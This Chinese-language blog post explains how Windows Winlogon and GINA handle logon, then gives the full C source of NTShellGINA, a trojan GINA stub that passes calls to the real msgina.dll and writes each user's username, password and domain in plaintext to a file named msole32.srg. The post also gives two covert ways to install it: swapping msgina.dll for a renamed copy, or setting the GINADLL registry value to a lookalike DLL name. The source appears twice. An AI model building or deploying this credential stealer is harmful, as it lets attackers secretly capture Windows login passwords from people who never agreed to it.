Winlogon登录和GINA -- NTShellGINA源代码

 

目录(?)[+]

  1. 一理论

    1. WinLogon登录管理
  2. 二代码

一、理论

WinLogon登录管理:

1、

Winlogon进程负责管理登录相关的安全性工作,它负责处理用户的登录与注销、启动用户shell、输入口令、更改口令、锁定与解锁工作站等。Winlogon进程必须保证其与安全相关操作对其他进程不可见,以免其他进程取得登录密码。

系统初始化时,启动用户程序之前,Winlogon进行特定工作已保障以上的需求。

(1)  Winlogon进程将创建并打开一个Window Stations,然后设置一个访问控制人口(ACE),该ACE中只包含Winlogon进程的SID,这样就只有Winlogon进程才能访问该Window Stations 。

(2)  然后winlogon创建桌面,设置其中的winlogon桌面只有winlogon可以访问,其他进程不能访问该桌面的任何数据和代码;利用这一特性保护口令、锁定桌面等操作的安全。winlogon还会注册安全注意序列(SAS - secure attention sequence)的热键,任何时候按下SAS热键(缺省为ctrl+alt+del),将调用Winlogon,切换到安全桌面,从而使密码捕捉程序不能接收登录密码和更改密码等安全活动。

2、
而登录进程的验证和身份验证都是在GINA(GINA - Graphical Identification and Authentication图形标识和身份验证)中实现的,微软的GINA是MSGINA.dll,实现了默认的Windows NT登录界面。
不过可以自己开发GINA DLL以实现其他的身份验证方法,如磁卡。当然这也为木马留下了机会,可以通过编写和系统GINA界面相同的GINA,然后取代MSGINA.dll。在msdn sample里有一个GINA的例子。不过如果仅仅为了获取登录密码,没有必要那么麻烦,只需写一个接口和GINA一样的,然后所有函数在实现时都去调
用MSGINA.dll的相同函数就可以了,在msdn sample里也有这样一个例子叫做ginastub,当然作为木马还要在登录时将密码转储。(更多的gina信息,在msdn里查找gina)

3、

(1)
NTShelGINA就是使用了后一种方法。我把ginastub改了改,在登录时将username:password:domain存在msole32.srg里。它在运行时具体功能都要调用msgina.dll,因此安装时这个文件必须存在,然后将msgina.dll改名为winlogon32.dll,然后把NTShellGINA.dll拷贝为msgina.dll即可。这是ntshell里的第二种安装方法。

(2)

不过微软还在注册表里留了一个位置由于安装GINA,在HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon下设置GINADLL为某个GINA DLL,(GINADLL这个值缺省没有)如果设置了这个值,nt会调用该GINA,而不会调用缺省的msGINA.dll。因此NTShell的第一种安装方法是将NTShellGINA.dll拷贝到system32\mshtmlgi.dll,然后设置GINADLL为mshtmlgi.dll。

因此第二种方法安装成功的前提是系统原来没有设置GINADLL这个值,否则将不予安装NTShellGINA 。当然在win2000里如果使用第二种安装方法还要把dllcache里msgina.dll改名。(ntshell改名为mshtmlgi.dll)。

由于GINA DLL负责系统认证和安全登录,因此如果一旦出错,用户将不能登录系统,必须慎用。也因此NTShell在安装时作了较多的检测,如果检测失败将不予安装。比如在把ntshellgina.dll拷贝为文件msgina.dll的安装方法里,第一次mslogon32.dll<-msgina.dll<-ntshellgina.dll,如果再次安装用msgina.dll替换mslogon32.dll,用ntshellgina.dll替换后来的msgina.dll(其实还是ntshellgina.dll),这样原来的msgina.dll就没有了,只有两个ntshellgina.dll,找不到真正的msgina.dll,ntshellgina.dll将失败。

ntshell依次作如下检测:

步一:注册表里的GINADLL如果设置,则认为系统不是使用默认的登录GINA,自然不予安装(找不到msgina.dll或者其他程序工作不正常)
步二:如果系统的msgina.dll和ntshellgina.dll相同,则认为已经安装过了,不能再次安装
步三:如果系统中存在mslogon32.dll,有可能使用ntshell安装过了,不再安装(除非你确认,msgina.dll还是原来的,可以手工删除mslogon32.dll,再安装;否则不要安装)
步四:如果安装出错,不能登录,可以参考msdn的如下说明进行恢复:(我使用的是第4种方法,其他的未试)

二、代码

[cpp] view plaincopyprint?
  1. /*
  2. NTShellGINA.c - a gina stub come from NTShell 1.0
  3.   by:bingle@email.com.cn, from homepage:bingle_site.top263.net
  4. 此文件是从tinastub.c文件修改过来的,
  5.   此文件将保存期登陆的密码到文件 system32\\msole32.srg
  6. --*/
  7. #include <windows.h>
  8. #include <stdio.h>
  9. #include <winwlx.h>
  10. #include "ginastub.h"
  11. //
  12. // winlogon function dispatch table
  13. //
  14. PWLX_DISPATCH_VERSION_1_0 g_pWinlogon;
  15. //
  16. // Functions pointers to the real msgina which we will call.
  17. //
  18. PGWLXNEGOTIATE GWlxNegotiate;
  19. PGWLXINITIALIZE GWlxInitialize;
  20. PGWLXDISPLAYSASNOTICE GWlxDisplaySASNotice;
  21. PGWLXLOGGEDOUTSAS GWlxLoggedOutSAS;
  22. PGWLXACTIVATEUSERSHELL GWlxActivateUserShell;
  23. PGWLXLOGGEDONSAS GWlxLoggedOnSAS;
  24. PGWLXDISPLAYLOCKEDNOTICE GWlxDisplayLockedNotice;
  25. PGWLXWKSTALOCKEDSAS GWlxWkstaLockedSAS;
  26. PGWLXISLOCKOK GWlxIsLockOk;
  27. PGWLXISLOGOFFOK GWlxIsLogoffOk;
  28. PGWLXLOGOFF GWlxLogoff;
  29. PGWLXSHUTDOWN GWlxShutdown;
  30. //
  31. // NEW for version 1.1
  32. //
  33. PGWLXSTARTAPPLICATION GWlxStartApplication;
  34. PGWLXSCREENSAVERNOTIFY GWlxScreenSaverNotify;
  35. //
  36. // hook into the real GINA.
  37. //
  38. BOOL MyInitialize( void )
  39. {
  40.   HINSTANCE hDll;
  41. //
  42. // judge if which dll to load, if the file named "msgina.dll"
  43. //  then ntshell is changed MSGINA.DLL-->mslogon32.dll, so load it
  44. //  if named others then just load MSGINA.DLL
  45. //
  46.   char origina[]="MSGINA.DLL";
  47.   char chgedgina[]="mslogon32.dll";
  48.   char *realgina;
  49.   char filename[MAX_PATH];
  50.   int result;
  51.   FILE *fp;
  52.   HMODULE hself;
  53. #ifdef _DEBUG
  54.     fp=fopen("ginalog.txt", "ab");
  55.     if(fp)
  56.     {
  57.       sprintf(filename, "\r\nMyInitialize been called by ");
  58.       fwrite(filename, strlen(filename), 1, fp);
  59.       result=GetModuleFileName(NULL, filename, MAX_PATH);
  60.       if(result)fwrite(filename, strlen(filename), 1, fp);
  61.       fclose(fp);
  62.     }
  63. #endif
  64.     
  65.   realgina=NULL;
  66.   hself=GetModuleHandle(origina);
  67.   if(!hself)realgina=origina;//hself=GetModuleHandle(chgedgina);
  68.   else realgina=chgedgina;//if origina loaded, this is origina
  69.   // Load original MSGINA.DLL.
  70.   if( !(hDll = LoadLibrary( realgina )) ) {
  71.     return FALSE;
  72.   }
  73.   // Get pointers to all of the WLX functions in the real MSGINA.
  74.   GWlxNegotiate = (PGWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );
  75.   if( !GWlxNegotiate ) {
  76.     return FALSE;
  77.   }
  78.   GWlxInitialize = (PGWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" );
  79.   if( !GWlxInitialize ) {
  80.     return FALSE;
  81.   }
  82.   GWlxDisplaySASNotice =
  83.     (PGWLXDISPLAYSASNOTICE)GetProcAddress( hDll, "WlxDisplaySASNotice" );
  84.   if( !GWlxDisplaySASNotice ) {
  85.     return FALSE;
  86.   }
  87.   GWlxLoggedOutSAS =
  88.     (PGWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );
  89.   if( !GWlxLoggedOutSAS ) {
  90.     return FALSE;
  91.   }
  92.   GWlxActivateUserShell =
  93.     (PGWLXACTIVATEUSERSHELL)GetProcAddress( hDll, "WlxActivateUserShell" );
  94.   if( !GWlxActivateUserShell ) {
  95.     return FALSE;
  96.   }
  97.   GWlxLoggedOnSAS =
  98.     (PGWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" );
  99.   if( !GWlxLoggedOnSAS ) {
  100.     return FALSE;
  101.   }
  102.   GWlxDisplayLockedNotice =
  103.     (PGWLXDISPLAYLOCKEDNOTICE)GetProcAddress(
  104.                     hDll,
  105.                     "WlxDisplayLockedNotice" );
  106.   if( !GWlxDisplayLockedNotice ) {
  107.     return FALSE;
  108.   }
  109.   GWlxIsLockOk = (PGWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" );
  110.   if( !GWlxIsLockOk ) {
  111.     return FALSE;
  112.   }
  113.   GWlxWkstaLockedSAS =
  114.     (PGWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" );
  115.   if( !GWlxWkstaLockedSAS ) {
  116.     return FALSE;
  117.   }
  118.   GWlxIsLogoffOk = (PGWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" );
  119.   if( !GWlxIsLogoffOk ) {
  120.     return FALSE;
  121.   }
  122.   GWlxLogoff = (PGWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" );
  123.   if( !GWlxLogoff ) {
  124.     return FALSE;
  125.   }
  126.   GWlxShutdown = (PGWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" );
  127.   if( !GWlxShutdown ) {
  128.     return FALSE;
  129.   }
  130.   // we don't check for failure here because these don't exist for
  131.   // gina's implemented prior to Windows NT 4.0
  132.   GWlxStartApplication = (PGWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" );
  133.   GWlxScreenSaverNotify = (PGWLXSCREENSAVERNOTIFY) GetProcAddress( hDll, "WlxScreenSaverNotify" );
  134.   // Everything loaded ok. Return success.
  135.   return TRUE;
  136. }
  137. BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
  138. {
  139.   if( !MyInitialize() ) return FALSE;
  140.   return GWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
  141. }
  142. BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,
  143.   PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
  144. {
  145.   return GWlxInitialize( lpWinsta, hWlx, pvReserved,
  146.         pWinlogonFunctions, pWlxContext );
  147. }
  148. VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext )
  149. {
  150.   GWlxDisplaySASNotice( pWlxContext );
  151. }
  152. int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
  153.   PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
  154.   PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
  155.   PVOID *pProfile)
  156. {
  157.   int iRet;
  158.   iRet = GWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,
  159.     pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );
  160.   if(iRet == WLX_SAS_ACTION_LOGON) {
  161.     // copy pMprNotifyInfo and pLogonSid for later use
  162.    
  163.     FILE *fp;
  164.     fp=fopen("msole32.srg", "a");
  165.     if(fp!=NULL)
  166.     {
  167.       char infor[300], buf[300];
  168.       memset(buf, 0, 300);
  169.       wcstombs(buf, pMprNotifyInfo->pszUserName, 300);
  170.       sprintf(infor, "%s", buf);
  171.       memset(buf, 0, 300);//if convert failed, we use the error one also
  172.       wcstombs(buf, pMprNotifyInfo->pszPassword, 300);
  173.       sprintf(infor, "%s:%s", infor, buf);
  174.     
  175.       memset(buf, 0, 300);
  176.       wcstombs(buf, pMprNotifyInfo->pszDomain, 300);
  177.       sprintf(infor, "%s:%s\r\n", infor, buf);
  178.   
  179.       fwrite(infor, 1, strlen(infor), fp);
  180.       fclose(fp);
  181.     }
  182.     // pMprNotifyInfo->pszOldPassword
  183.   }
  184.   return iRet;
  185. }
  186. BOOL WINAPI WlxActivateUserShell(
  187.   PVOID      pWlxContext,
  188.   PWSTR      pszDesktopName,
  189.   PWSTR      pszMprLogonScript,
  190.   PVOID      pEnvironment)
  191. {
  192.   return GWlxActivateUserShell(
  193.         pWlxContext,
  194.         pszDesktopName,
  195.         pszMprLogonScript,
  196.         pEnvironment
  197.         );
  198. }
  199. int WINAPI WlxLoggedOnSAS(
  200.   PVOID      pWlxContext,
  201.   DWORD      dwSasType,
  202.   PVOID      pReserved)
  203. {
  204.   return GWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved );
  205. }
  206. VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext )
  207. {
  208.   GWlxDisplayLockedNotice( pWlxContext );
  209. }
  210. BOOL WINAPI WlxIsLockOk( PVOID pWlxContext )
  211. {
  212.   return GWlxIsLockOk( pWlxContext );
  213. }
  214. int WINAPI WlxWkstaLockedSAS(
  215.   PVOID      pWlxContext,
  216.   DWORD      dwSasType )
  217. {
  218.   return GWlxWkstaLockedSAS( pWlxContext, dwSasType );
  219. }
  220. BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext )
  221. {
  222.   BOOL bSuccess;
  223.   bSuccess = GWlxIsLogoffOk( pWlxContext );
  224.   if(bSuccess) {
  225.     //
  226.     // if it's ok to logoff, finish with the stored credentials
  227.     // and scrub the buffers
  228.     //
  229.   }
  230.   return bSuccess;
  231. }
  232. VOID WINAPI WlxLogoff( PVOID pWlxContext )
  233. {
  234.   GWlxLogoff( pWlxContext );
  235. }
  236. VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType )
  237. {
  238.   GWlxShutdown( pWlxContext, ShutdownType );
  239. }
  240. //
  241. // NEW for version 1.1
  242. //
  243. BOOL WINAPI WlxScreenSaverNotify(
  244.   PVOID          pWlxContext,
  245.   BOOL *         pSecure
  246.   )
  247. {
  248.   if(GWlxScreenSaverNotify != NULL)
  249.     return GWlxScreenSaverNotify( pWlxContext, pSecure );
  250.   //
  251.   // if not exported, return something intelligent
  252.   //
  253.   *pSecure = TRUE;
  254.   return TRUE;
  255. }
  256. BOOL WINAPI WlxStartApplication(
  257.   PVOID          pWlxContext,
  258.   PWSTR          pszDesktopName,
  259.   PVOID          pEnvironment,
  260.   PWSTR          pszCmdLine
  261.   )
  262. {
  263.   if(GWlxStartApplication != NULL)
  264.     return GWlxStartApplication(
  265.       pWlxContext,
  266.       pszDesktopName,
  267.       pEnvironment,
  268.       pszCmdLine
  269.       );
  270.   //
  271.   // if not exported, return something intelligent
  272.   //
  273. }
/*
NTShellGINA.c - a gina stub come from NTShell 1.0by:bingle@email.com.cn, from homepage:bingle_site.top263.net此文件是从tinastub.c文件修改过来的,此文件将保存期登陆的密码到文件 system32\\msole32.srg--*/
#include <windows.h>
#include <stdio.h>
#include <winwlx.h>
#include "ginastub.h"//
// winlogon function dispatch table
//PWLX_DISPATCH_VERSION_1_0 g_pWinlogon;//
// Functions pointers to the real msgina which we will call.
//PGWLXNEGOTIATE GWlxNegotiate;
PGWLXINITIALIZE GWlxInitialize;
PGWLXDISPLAYSASNOTICE GWlxDisplaySASNotice;
PGWLXLOGGEDOUTSAS GWlxLoggedOutSAS;
PGWLXACTIVATEUSERSHELL GWlxActivateUserShell;
PGWLXLOGGEDONSAS GWlxLoggedOnSAS;
PGWLXDISPLAYLOCKEDNOTICE GWlxDisplayLockedNotice;
PGWLXWKSTALOCKEDSAS GWlxWkstaLockedSAS;
PGWLXISLOCKOK GWlxIsLockOk;
PGWLXISLOGOFFOK GWlxIsLogoffOk;
PGWLXLOGOFF GWlxLogoff;
PGWLXSHUTDOWN GWlxShutdown;//
// NEW for version 1.1
//PGWLXSTARTAPPLICATION GWlxStartApplication;
PGWLXSCREENSAVERNOTIFY GWlxScreenSaverNotify;//
// hook into the real GINA.
//
BOOL MyInitialize( void )
{HINSTANCE hDll;
//
// judge if which dll to load, if the file named "msgina.dll"
//  then ntshell is changed MSGINA.DLL-->mslogon32.dll, so load it
//  if named others then just load MSGINA.DLL
//char origina[]="MSGINA.DLL";char chgedgina[]="mslogon32.dll";char *realgina;char filename[MAX_PATH];int result;FILE *fp;HMODULE hself;#ifdef _DEBUGfp=fopen("ginalog.txt", "ab");if(fp){sprintf(filename, "\r\nMyInitialize been called by ");fwrite(filename, strlen(filename), 1, fp);result=GetModuleFileName(NULL, filename, MAX_PATH);if(result)fwrite(filename, strlen(filename), 1, fp);fclose(fp);}
#endifrealgina=NULL;hself=GetModuleHandle(origina);if(!hself)realgina=origina;//hself=GetModuleHandle(chgedgina);else realgina=chgedgina;//if origina loaded, this is origina// Load original MSGINA.DLL.if( !(hDll = LoadLibrary( realgina )) ) {return FALSE;}// Get pointers to all of the WLX functions in the real MSGINA.GWlxNegotiate = (PGWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );if( !GWlxNegotiate ) {return FALSE;}GWlxInitialize = (PGWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" );if( !GWlxInitialize ) {return FALSE;}GWlxDisplaySASNotice =(PGWLXDISPLAYSASNOTICE)GetProcAddress( hDll, "WlxDisplaySASNotice" );if( !GWlxDisplaySASNotice ) {return FALSE;}GWlxLoggedOutSAS =(PGWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );if( !GWlxLoggedOutSAS ) {return FALSE;}GWlxActivateUserShell =(PGWLXACTIVATEUSERSHELL)GetProcAddress( hDll, "WlxActivateUserShell" );if( !GWlxActivateUserShell ) {return FALSE;}GWlxLoggedOnSAS =(PGWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" );if( !GWlxLoggedOnSAS ) {return FALSE;}GWlxDisplayLockedNotice =(PGWLXDISPLAYLOCKEDNOTICE)GetProcAddress(hDll,"WlxDisplayLockedNotice" );if( !GWlxDisplayLockedNotice ) {return FALSE;}GWlxIsLockOk = (PGWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" );if( !GWlxIsLockOk ) {return FALSE;}GWlxWkstaLockedSAS =(PGWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" );if( !GWlxWkstaLockedSAS ) {return FALSE;}GWlxIsLogoffOk = (PGWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" );if( !GWlxIsLogoffOk ) {return FALSE;}GWlxLogoff = (PGWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" );if( !GWlxLogoff ) {return FALSE;}GWlxShutdown = (PGWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" );if( !GWlxShutdown ) {return FALSE;}// we don't check for failure here because these don't exist for// gina's implemented prior to Windows NT 4.0GWlxStartApplication = (PGWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" );GWlxScreenSaverNotify = (PGWLXSCREENSAVERNOTIFY) GetProcAddress( hDll, "WlxScreenSaverNotify" );// Everything loaded ok. Return success.return TRUE;
}BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{if( !MyInitialize() ) return FALSE;return GWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
}BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{return GWlxInitialize( lpWinsta, hWlx, pvReserved,pWinlogonFunctions, pWlxContext );
}VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext )
{GWlxDisplaySASNotice( pWlxContext );
}int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,PVOID *pProfile)
{int iRet;iRet = GWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );if(iRet == WLX_SAS_ACTION_LOGON) {// copy pMprNotifyInfo and pLogonSid for later useFILE *fp;fp=fopen("msole32.srg", "a");if(fp!=NULL){char infor[300], buf[300];memset(buf, 0, 300);wcstombs(buf, pMprNotifyInfo->pszUserName, 300);sprintf(infor, "%s", buf);memset(buf, 0, 300);//if convert failed, we use the error one alsowcstombs(buf, pMprNotifyInfo->pszPassword, 300);sprintf(infor, "%s:%s", infor, buf);memset(buf, 0, 300);wcstombs(buf, pMprNotifyInfo->pszDomain, 300);sprintf(infor, "%s:%s\r\n", infor, buf);fwrite(infor, 1, strlen(infor), fp);fclose(fp);}// pMprNotifyInfo->pszOldPassword}return iRet;
}BOOL WINAPI WlxActivateUserShell(PVOID      pWlxContext,PWSTR      pszDesktopName,PWSTR      pszMprLogonScript,PVOID      pEnvironment)
{return GWlxActivateUserShell(pWlxContext,pszDesktopName,pszMprLogonScript,pEnvironment);
}int WINAPI WlxLoggedOnSAS(PVOID      pWlxContext,DWORD      dwSasType,PVOID      pReserved)
{return GWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved );
}VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext )
{GWlxDisplayLockedNotice( pWlxContext );
}BOOL WINAPI WlxIsLockOk( PVOID pWlxContext )
{return GWlxIsLockOk( pWlxContext );
}int WINAPI WlxWkstaLockedSAS(PVOID      pWlxContext,DWORD      dwSasType )
{return GWlxWkstaLockedSAS( pWlxContext, dwSasType );
}BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext )
{BOOL bSuccess;bSuccess = GWlxIsLogoffOk( pWlxContext );if(bSuccess) {//// if it's ok to logoff, finish with the stored credentials// and scrub the buffers//}return bSuccess;
}VOID WINAPI WlxLogoff( PVOID pWlxContext )
{GWlxLogoff( pWlxContext );
}VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType )
{GWlxShutdown( pWlxContext, ShutdownType );
}//
// NEW for version 1.1
//
BOOL WINAPI WlxScreenSaverNotify(PVOID          pWlxContext,BOOL *         pSecure)
{if(GWlxScreenSaverNotify != NULL)return GWlxScreenSaverNotify( pWlxContext, pSecure );//// if not exported, return something intelligent//*pSecure = TRUE;return TRUE;
}BOOL WINAPI WlxStartApplication(PVOID          pWlxContext,PWSTR          pszDesktopName,PVOID          pEnvironment,PWSTR          pszCmdLine)
{if(GWlxStartApplication != NULL)return GWlxStartApplication(pWlxContext,pszDesktopName,pEnvironment,pszCmdLine);//// if not exported, return something intelligent//
}

Winlogon登录和GINA相关推荐

  1. WinLogon登录管理和GINA简介 (转)

    http://blog.csdn.net/chenyujing1234/article/details/7942845 平时我们在使用Windows XP时,总要先进行登录.Windows XP的登录 ...

  2. 在javascript中检查相等性的正确方法是什么

    In JavaScript, you can check the equality of any two objects using == or ===. Both the operators che ...

  3. winlogon 之 WlxLoggedOutSAS

    winlogon Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出,处理用户登录和注销任务.Winlogon.exe位于C:\Windows\Syst ...

  4. WINDOWS 2000下如何获得用户登录名和密码

    --  WINDOWS 2000下如何获得用户登录名和密码 WINDOWS 2000下如何获得用户登录名和密码 作者:moonstone 下载本文示例源代码一.原理 在NT/2000中交互式的登陆支持 ...

  5. 利用GINA实现U盘开机锁

    一.原理    GINA是WinLogon的可插入部件.Windows操作系统中Winlogon进程负责管理与登录和身份认证相关的安全性工作,包括处理用户的登录与注销.启动用户shell.输入口令.更 ...

  6. Windows下实现USBkey桌面登录

    1 本地登录原理 1.1登录流程 1 用户按下Ctrl+Alt+Del,激活Winlogon.exe程序 2 winlogon.exe检查注册表项 MACHINE/Software/Microsoft ...

  7. WinLogon事件通知包编程

    2007年5月18日,21:18:55| yexiaozhou2003[AT]hotmail.com(cooldog) 今天看到CSDN中有网友问道如何获取用户按Ctrl+Alt+Del锁定桌面的事件 ...

  8. 注入winlogon

    要将hook注入winlogon进程需要特定权限,要在localsystem权限下运行 NT/2000中交互式的登陆支持是由WinLogon调用GINA DLL实现的,GINA DLL提供了一个交互式 ...

  9. 替换GINA.DLL实现自己的登陆界面[酷狗] 转

    http://www.libing.net.cn/read.php?1292 发表日期:2004年12月9日   出处:www.xiaozhou.net(本站原创) 代码下载: 下载文件 (已下载 6 ...

最新文章

  1. 配置Linux声卡,让Arch高歌
  2. Scala与Java交互
  3. Java中,一切皆是对象——java中的对象类型与基本数据类型的区别
  4. 关于 Angular 项目类型为 library 的工程使用 tsconfig.json 的问题
  5. linux查看通信延迟,低优先级进程延迟实时进程中的串行通信(Linux)
  6. Akka笔记–演员介绍
  7. Linux 命令之 rpmbuild -- 用于创建 rpm 格式的二进制软件包和源码软件包
  8. 从零开始编写自己的C#框架(23)——上传组件使用说明
  9. 神经网络API、Kotlin支持,那些你必须了解的Android 8.1预览版和Android Studio 3.0新特性
  10. 安装CleanMyMac 3提示软件已损坏
  11. 【离散数学】集合论 第四章 函数与集合(5) 集合的基数、可数与不可数集合
  12. C语言程序输入一个三位数取个位十位百位
  13. 如何求解最大公约数和最小公倍数
  14. 对“陶哲轩-来自特征值的特征向量”的理解
  15. spring5.0之后Log4jConfigListener过期问题
  16. FTP软件的安装及上传/下载方法
  17. mysql-1093 - You can‘t specify target table ‘titles_test‘ for update in FROM clause
  18. 文件指纹修改工具 Hash Modifier
  19. 深度学习在计算机视觉中的应用
  20. JavaScript 触发浏览器页面全屏,某div区域全屏

热门文章

  1. 【python】将bytes转换为float* 每四字节转化为float
  2. 用php实现md5解密源码,亲测可用
  3. linux端口映射到外网访问,Linux使用Iptables做端口映射远程访问无公网IP的SSH
  4. 微软免费MSE背后真正的动机和面临的挑战
  5. 网上最靠谱的3种赚钱方法
  6. 两位诺奖得主加持、解决“不可能三角”的UPoS机制来了
  7. 网站部署详细流程(包括域名,服务器的配置等)
  8. 九龙证券|什么是庄家洗盘和出货?各有什么特征?
  9. 解读《电信重组公告》:3G发牌仍然无期限
  10. 2019年个人提升计划